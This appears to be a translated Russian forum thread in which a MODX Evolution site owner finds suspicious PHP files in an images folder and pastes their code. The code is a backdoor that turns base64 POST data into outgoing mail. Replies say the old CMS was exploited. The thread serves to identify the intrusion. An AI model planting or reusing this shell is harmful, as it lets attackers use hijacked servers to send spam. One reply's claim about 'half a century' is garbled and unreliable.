В моих ресурсах modx есть странные файлы php -> images
cklxt.php.php.php.php
cklxt.php.php.php.php.php
Если я открою их, код не будет связан с изображениями:
<?php
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb']));
$xuoh = stripslashes(base64_decode($_POST['maih']));
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon']));
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg']));
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo));
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;}
Есть еще много …
Эти php файлы должны быть там? Или это ошибки или сайт взломан?
Evolution CMS больше официально не поддерживается MODX. Еще в ноябре произошел ряд неудачных попыток, и сообщество, отвечающее за кодовую базу, отреагировало медленно. В конце концов, был выпущен патч, но с ним были сотни других изменений кода. Существует множество временных решений для предотвращения этих взломов, но, возможно, лучше проконсультироваться с разработчиком Evolution, чтобы вернуть ваш сайт в нормальное состояние.
Я бы не стал винить это приложение, так как ему более 11 лет, и у него было всего около 12 CVE. Это было просто устаревшим, не исправленным и было заменено Революцией в течение почти полувека.
Других решений пока нет …